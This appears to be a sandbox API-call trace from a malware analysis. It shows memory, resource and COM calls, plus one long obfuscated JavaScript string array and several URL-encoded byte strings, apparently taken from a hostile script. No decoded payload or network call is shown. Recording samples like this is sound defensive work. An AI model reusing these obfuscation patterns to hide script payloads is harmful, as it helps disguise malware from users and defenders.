	[0058.534] ??2@YAPEAX_K@Z () returned 0x66f3f0
	[0058.534] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0058.534] GetProcessHeap () returned 0x3f0000
	[0058.534] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x428430, Size=0x11238) returned 0x45ae20
	[0058.535] ??2@YAPEAX_K@Z () returned 0x66f480
	[0058.535] GetCurrentThreadId () returned 0xa1c
	[0058.535] realloc (_Block=0x0, _Size=0xc8) returned 0x66f4e0
	[0058.535] ??2@YAPEAX_K@Z () returned 0x66f5b0
	[0058.535] malloc (_Size=0x1008) returned 0x66a4f0
	[0058.535] ??2@YAPEAX_K@Z () returned 0x66f5f0
	[0058.536] malloc (_Size=0x108) returned 0x667d80
	[0058.536] malloc (_Size=0x208) returned 0x66f7a0
	[0058.536] malloc (_Size=0x200) returned 0x66f9b0
	[0058.537] malloc (_Size=0x408) returned 0x66fbc0
	[0058.537] malloc (_Size=0x2008) returned 0x66b500
	[0058.537] malloc (_Size=0x808) returned 0x66d510
	[0058.537] malloc (_Size=0x1008) returned 0x66dd20
	[0058.538] malloc (_Size=0x4008) returned 0xbdfd0
	[0058.539] malloc (_Size=0x2008) returned 0xc1fe0
	[0058.541] malloc (_Size=0x4008) returned 0xc3ff0
	[0058.739] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0058.739] CObjectContext::Release () returned 0x1
	[0058.739] GetTickCount () returned 0x1f881
	[0058.740] ??2@YAPEAX_K@Z () returned 0xc6560
	[0058.740] ??2@YAPEAX_K@Z () returned 0xc6590
	[0058.740] ??2@YAPEAX_K@Z () returned 0xc65c0
	[0058.741] ??2@YAPEAX_K@Z () returned 0xc65f0
	[0058.741] ??2@YAPEAX_K@Z () returned 0xc6620
	[0058.742] ??2@YAPEAX_K@Z () returned 0xc6650
	[0058.742] ??2@YAPEAX_K@Z () returned 0xc6680
	[0058.743] ??2@YAPEAX_K@Z () returned 0xc66b0
	[0058.743] ??2@YAPEAX_K@Z () returned 0xc66e0
	[0058.744] ??2@YAPEAX_K@Z () returned 0xc6710
	[0058.744] ??2@YAPEAX_K@Z () returned 0xc6740
	[0058.745] ??2@YAPEAX_K@Z () returned 0xc6770
	[0058.745] ??2@YAPEAX_K@Z () returned 0xc67a0
	[0058.747] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0058.747] CObjectContext::Release () returned 0x1
	[0058.747] GetTickCount () returned 0x1f881
	[0058.747] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0058.748] CObjectContext::Release () returned 0x1
	[0058.748] GetTickCount () returned 0x1f881
	[0058.749] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0058.749] CObjectContext::Release () returned 0x1
	[0058.749] GetTickCount () returned 0x1f881
	[0058.750] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0058.750] CObjectContext::Release () returned 0x1
	[0058.750] GetTickCount () returned 0x1f881
	[0058.750] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0058.750] CObjectContext::Release () returned 0x1
	[0058.750] GetTickCount () returned 0x1f881
	[0058.753] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0058.753] CObjectContext::Release () returned 0x1
	[0058.753] GetTickCount () returned 0x1f881
	[0058.756] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0058.756] CObjectContext::Release () returned 0x1
	[0058.756] GetTickCount () returned 0x1f890
	[0058.757] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0058.757] CObjectContext::Release () returned 0x1
	[0058.757] GetTickCount () returned 0x1f890
	[0058.757] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0058.757] CObjectContext::Release () returned 0x1
	[0058.757] GetTickCount () returned 0x1f890
	[0058.758] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0058.758] CObjectContext::Release () returned 0x1
	[0058.758] GetTickCount () returned 0x1f890
	[0058.759] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0058.759] CObjectContext::Release () returned 0x1
	[0058.759] GetTickCount () returned 0x1f890
	[0058.759] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0058.759] CObjectContext::Release () returned 0x1
	[0058.759] GetTickCount () returned 0x1f890
	[0058.760] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0058.760] CObjectContext::Release () returned 0x1
	[0058.760] GetTickCount () returned 0x1f890
	[0058.761] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0058.761] CObjectContext::Release () returned 0x1
	[0058.761] GetTickCount () returned 0x1f890
	[0058.762] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0058.762] CObjectContext::Release () returned 0x1
	[0058.762] GetTickCount () returned 0x1f890
	[0058.762] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0058.762] CObjectContext::Release () returned 0x1
	[0058.762] GetTickCount () returned 0x1f890
	[0058.763] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0058.763] CObjectContext::Release () returned 0x1
	[0058.763] GetTickCount () returned 0x1f890
	[0058.764] FindResourceA (hModule=0x7fee1590000, lpName=0x139, lpType=0x6) returned 0x5007f8
	[0058.765] LoadResource (hModule=0x7fee1590000, hResInfo=0x5007f8) returned 0x501d44
	[0058.765] LockResource (hResData=0x501d44) returned 0x501d44
	[0058.765] SizeofResource (hModule=0x7fee1590000, hResInfo=0x5007f8) returned 0x15c
	[0058.765] FreeResource (hResData=0x501d44) returned 0
	[0058.765] FindResourceA (hModule=0x7fee1590000, lpName=0x101, lpType=0x6) returned 0x5007e8
	[0058.765] LoadResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0x501c74
	[0058.765] LockResource (hResData=0x501c74) returned 0x501c74
	[0058.765] SizeofResource (hModule=0x7fee1590000, hResInfo=0x5007e8) returned 0xce
	[0058.765] FreeResource (hResData=0x501c74) returned 0
	[0058.765] bsearch (_Key=0x2ccbe8, _Base=0x7fee165a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee15e81a0) returned 0x7fee165a5a8
	[0058.766] ??2@YAPEAX_K@Z () returned 0x100a20
	[0058.766] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0058.766] CObjectContext::Release () returned 0x1
	[0058.766] GetTickCount () returned 0x1f890
	[0058.768] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0058.768] CObjectContext::Release () returned 0x1
	[0058.768] GetTickCount () returned 0x1f890
	[0058.769] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0058.769] CObjectContext::Release () returned 0x1
	[0058.769] GetTickCount () returned 0x1f890
	[0058.769] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0058.769] CObjectContext::Release () returned 0x1
	[0058.769] GetTickCount () returned 0x1f890
	[0058.802] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0058.802] CObjectContext::Release () returned 0x1
	[0058.802] GetTickCount () returned 0x1f8bf
	[0058.803] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0058.803] CObjectContext::Release () returned 0x1
	[0058.803] GetTickCount () returned 0x1f8bf
	[0058.805] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0058.805] CObjectContext::Release () returned 0x1
	[0058.805] GetTickCount () returned 0x1f8bf
	[0058.806] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0058.806] CObjectContext::Release () returned 0x1
	[0058.807] GetTickCount () returned 0x1f8bf
	[0058.808] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0058.808] CObjectContext::Release () returned 0x1
	[0058.808] GetTickCount () returned 0x1f8bf
	[0058.811] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0058.811] CObjectContext::Release () returned 0x1
	[0058.811] GetTickCount () returned 0x1f8bf
	[0058.815] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0058.815] CObjectContext::Release () returned 0x1
	[0058.815] GetTickCount () returned 0x1f8bf
	[0058.829] SysStringLen (param_1="%7a%75%c2%bf%c2%bb") returned 0x12
	[0058.830] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.831] SysStringLen (param_1="%c3%ae%2e%c2%a7%36%c3%86") returned 0x18
	[0058.832] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.833] SysStringLen (param_1="%1e%70%42%06") returned 0xc
	[0058.834] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.835] SysStringLen (param_1="%c2%a6%02%61%06%1f") returned 0x12
	[0058.835] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.837] SysStringLen (param_1="%5c%56%c3%98%c2%a7%c2%80%c2%8b%c2%9e%c3%af%c3%a6%68%c2%ae") returned 0x39
	[0058.837] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.841] GetTickCount () returned 0x1f8de
	[0058.842] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c71c8 | out: ppv=0x2c71c8*=0x40f420) returned 0x0
	[0058.843] ??3@YAXPEAX@Z () returned 0x8a00e30001
	[0058.843] ??3@YAXPEAX@Z () returned 0x1
	[0058.843] ??3@YAXPEAX@Z () returned 0x19800530001
	[0058.843] ??3@YAXPEAX@Z () returned 0x19900140001
	[0058.843] ??3@YAXPEAX@Z () returned 0x19a00110001
	[0058.843] ??3@YAXPEAX@Z () returned 0x19b000e0001
	[0058.843] ??3@YAXPEAX@Z () returned 0x19c000b0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x19d00080001
	[0058.844] ??3@YAXPEAX@Z () returned 0x19e00050001
	[0058.844] ??3@YAXPEAX@Z () returned 0x19f00020001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a0007a0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a100770001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a200740001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a300710001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a4006e0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a5006b0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a600680001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a700650001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a800620001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1a9005f0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1aa005c0001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1ab00590001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1ac00560001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1ad00500001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1ae00260001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1af00230001
	[0058.844] ??3@YAXPEAX@Z () returned 0x1b000200001
	[0058.845] ??3@YAXPEAX@Z () returned 0x1b1001d0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x1b2001a0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x1
	[0058.845] ??3@YAXPEAX@Z () returned 0x29700260001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29800d40001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29900d10001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29a00ce0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29b00cb0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29c00c80001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29d00c50001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29e00f20001
	[0058.845] ??3@YAXPEAX@Z () returned 0x29f00ef0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x2a000ec0001
	[0058.845] ??3@YAXPEAX@Z () returned 0x2a100e90001
	[0058.845] ??3@YAXPEAX@Z () returned 0x2a200e60001
	[0058.845] ??3@YAXPEAX@Z () returned 0x2a300e30001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a400e00001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a500290001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a600230001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a700200001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a8001d0001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2a9001a0001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2aa00170001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2ab00140001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2ac00110001
	[0058.846] ??3@YAXPEAX@Z () returned 0x2ad000e0001
	[0058.846] ??3@YAXPEAX@Z () returned 0x5007a0001
	[0058.846] ??3@YAXPEAX@Z () returned 0x1
	[0058.846] ??3@YAXPEAX@Z () returned 0x1c400290001
	[0058.846] ??3@YAXPEAX@Z () returned 0x1c500260001
	[0058.846] ??3@YAXPEAX@Z () returned 0x1c600230001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2ae000b0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x1c700200001
	[0058.847] ??3@YAXPEAX@Z () returned 0x1c8001d0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x1c9001a0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x1ca00170001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2af00ad0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b000aa0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x1cb00140001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b100a70001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b200a40001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b300a10001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b4009e0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b5009b0001
	[0058.847] ??3@YAXPEAX@Z () returned 0x2b600980001
	[0058.847] free (_Block=0x11e490) 
	[0058.847] free (_Block=0x14b520) 
	[0058.847] free (_Block=0x14f4f0) 
	[0058.847] free (_Block=0x11d080) 
	[0058.883] free (_Block=0x105840) 
	[0058.883] free (_Block=0xdbb40) 
	[0058.883] free (_Block=0xcee60) 
	[0058.883] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.883] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.884] ??3@YAXPEAX@Z () returned 0x2b700950001
	[0058.884] ??3@YAXPEAX@Z () returned 0x2b800920001
	[0058.884] ??3@YAXPEAX@Z () returned 0x2b900830001
	[0058.884] ??3@YAXPEAX@Z () returned 0x2ba00800001
	[0058.884] ??3@YAXPEAX@Z () returned 0x1cc00110001
	[0058.884] ??3@YAXPEAX@Z () returned 0x600660001
	[0058.884] free (_Block=0x120cb0) 
	[0058.884] free (_Block=0x14c390) 
	[0058.884] free (_Block=0x152d00) 
	[0058.884] free (_Block=0x11f8a0) 
	[0058.884] free (_Block=0x106250) 
	[0058.884] free (_Block=0xdc050) 
	[0058.884] free (_Block=0xcf0f0) 
	[0058.884] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.884] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.885] ??3@YAXPEAX@Z () returned 0x1cd000e0001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1ce004d0001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1cf004a0001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1d0003b0001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1d100380001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1d200350001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1d300320001
	[0058.885] ??3@YAXPEAX@Z () returned 0x1d4002f0001
	[0058.885] ??3@YAXPEAX@Z () returned 0x700520001
	[0058.885] free (_Block=0x116c30) 
	[0058.885] free (_Block=0x14bf70) 
	[0058.885] free (_Block=0x166980) 
	[0058.885] free (_Block=0x115820) 
	[0058.885] free (_Block=0x103a10) 
	[0058.885] free (_Block=0xdac10) 
	[0058.885] free (_Block=0xce6b0) 
	[0058.885] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.886] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.886] ??3@YAXPEAX@Z () returned 0x1d5002c0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1d600fb0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1d700f80001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1d800d10001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1d900ec0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1da00e90001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1db00e60001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1dc00e30001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1dd00e00001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1de00dd0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1df00da0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1e0000b0001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1e100080001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1e200050001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1e300020001
	[0058.886] ??3@YAXPEAX@Z () returned 0x1e4005f0001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1e500590001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1e600560001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1e700530001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1e800d70001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1e900d40001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1ea00ce0001
	[0058.887] ??3@YAXPEAX@Z () returned 0x1eb00cb0001
	[0058.887] ??3@YAXPEAX@Z () returned 0x8003e0001
	[0058.887] free (_Block=0x11bc70) 
	[0058.887] free (_Block=0x14bd60) 
	[0058.887] free (_Block=0x164170) 
	[0058.887] free (_Block=0x11a860) 
	[0058.888] free (_Block=0x104e30) 
	[0058.888] free (_Block=0xdb630) 
	[0058.888] free (_Block=0xcebd0) 
	[0058.888] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.888] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.888] ??3@YAXPEAX@Z () returned 0x1ec009e0001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1ed00c80001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1ee00c50001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1ef00c20001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f000bf0001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f100bc0001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f200b90001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f300b60001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f400b30001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f500b00001
	[0058.888] ??3@YAXPEAX@Z () returned 0x1f600ad0001
	[0058.889] ??3@YAXPEAX@Z () returned 0x1f700aa0001
	[0058.889] malloc (_Size=0x2808) returned 0x14f4f0
	[0058.890] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.892] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.894] realloc (_Block=0x0, _Size=0xc8) returned 0x146810
	[0058.941] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c36a8 | out: ppv=0x2c36a8*=0x40f420) returned 0x0
	[0058.941] MulDiv (nNumber=976, nNumerator=100, nDenominator=3461) returned 28
	[0058.942] IUnknown:Release (This=0x40f420) returned 0x1
	[0058.942] GetTickCount () returned 0x1f93c
	[0058.952] CoGetObjectContext (in: riid=0x7fee1636350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2c15d8 | out: ppv=0x2c15d8*=0x40f420) returned 0x0
	[0058.952] ??3@YAXPEAX@Z () returned 0x1
